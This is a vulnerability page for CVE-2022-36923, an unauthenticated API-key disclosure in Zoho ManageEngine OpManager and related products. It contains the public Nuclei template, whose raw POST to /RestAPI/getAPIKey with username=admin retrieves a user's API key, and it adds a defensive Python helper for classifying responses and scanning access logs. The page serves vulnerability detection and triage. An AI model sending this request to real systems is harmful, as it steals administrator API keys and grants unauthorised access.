CVE-2022-36923: Zoho ManageEngine - getUserAPIKey Authentication Bypass

Date: 2026-01-08 | Affected software: Zoho ManageEngine | PoC: public

Vulnerability description

Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user's API key, and then access external APIs.

PoC code [public]

id: CVE-2022-36923

info:
  name: Zoho ManageEngine - getUserAPIKey Authentication Bypass
  author: daffainfo,jjcho
  severity: high
  description: |
    Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user's API key, and then access external APIs.
  impact: |
    Attackers can obtain API keys and access external APIs, leading to potential data theft or unauthorized actions.
  remediation: |
    Apply the security patches released after 2022-07-28 or update to the latest version.
  reference:
    - https://www.manageengine.com/itom/advisory/cve-2022-36923.html
    - https://y4er.com/posts/cve-2022-36923-manageengine-opmanager-getuserapikey-authentication-bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36923
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36923
    epss-score: 0.23665
    epss-percentile: 0.95799
    cwe-id: CWE-755,CWE-284
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_msp:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_plus:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_oputils:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_firewall_analyzer,manageengine_netflow_analyzer,manageengine_network_configuration_manager,manageengine_opmanager,manageengine_opmanager_msp,manageengine_opmanager_plus,manageengine_oputils
  tags: cve,cve2022,zoho,manageengine,opmanager,oputils,auth-bypass,vkev

http:
  - raw:
      - |
        POST /RestAPI/getAPIKey HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=getUserAPIKey&username=admin&domainname=-&HANDSHAKE_KEY=pppppppppppppppppppppppppppppppppppp

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body) == 34"
          - 'regex("[0-9a-f]+", body)'
          - "status_code == 200"
          - "contains(set_cookie, 'opmcsrfcookie=')"
        condition: and

    extractors:
      - type: regex
        regex:
          - '[0-9a-f]+'
# digest: 4b0a00483046022100dc0c092eff6418f3a865f8c4c66dc2b7111cccac86aade5babbdd9f0f64d024f022100c48805a02d642530f010011138c858fbfd276ca65f4eca9ff6abf575ee1a0c10:922c64590222798bb761d5b6d8e72950
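For defenders triaging this issue, the following added helper (written for this page; not part of the Nuclei template, the vendor's code, or the referenced write-ups) applies the same response conditions the template's matchers use, so an analyst can classify a captured response as a likely key disclosure, and scans access-log lines for POSTs to the unauthenticated endpoint. The log format and sample lines are constructed assumptions; the body check is tightened to a full hex match so that arbitrary 34-byte pages are not flagged.

```python
import re
from typing import Iterable, List, Mapping

# Added detection helper (assumption: a combined-log style access log).
ENDPOINT = "/RestAPI/getAPIKey"
HEX_KEY = re.compile(r"[0-9a-f]+")

def looks_like_key_disclosure(status: int, headers: Mapping[str, str], body: str) -> bool:
    """Mirror the template's ANDed matchers: HTTP 200, 34-character body,
    hex-only body, and an opmcsrfcookie set on the response. The template only
    searches for the regex; requiring a full match is stricter on purpose."""
    set_cookie = headers.get("Set-Cookie", "")
    body = body.strip()
    return (
        status == 200
        and len(body) == 34
        and HEX_KEY.fullmatch(body) is not None
        and "opmcsrfcookie=" in set_cookie
    )

# Constructed log format: client, identity, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]+" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)"
)

# Constructed sample lines: one successful-looking hit, one unrelated request,
# one rejected attempt against the same endpoint.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jul/2022:10:01:02 +0000] "POST /RestAPI/getAPIKey HTTP/1.1" 200 34',
    '198.51.100.7 - - [28/Jul/2022:10:01:05 +0000] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/Jul/2022:10:01:09 +0000] "POST /RestAPI/getAPIKey HTTP/1.1" 401 12',
]

def flag_getapikey_hits(lines: Iterable[str]) -> List[dict]:
    """Return POSTs to the getAPIKey endpoint that came back 200 with a 34-byte
    body: these are the requests to review for an unauthenticated source."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?")[0]
        if m["method"] == "POST" and path == ENDPOINT and m["status"] == "200" and m["size"] == "34":
            hits.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for hit in flag_getapikey_hits(SAMPLE_LOG):
        print("review:", hit)
```

Access logs normally omit POST bodies, so the log scan keys on endpoint, method, status and size; the response classifier is for proxy captures or EDR/WAF events that retain headers and body.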
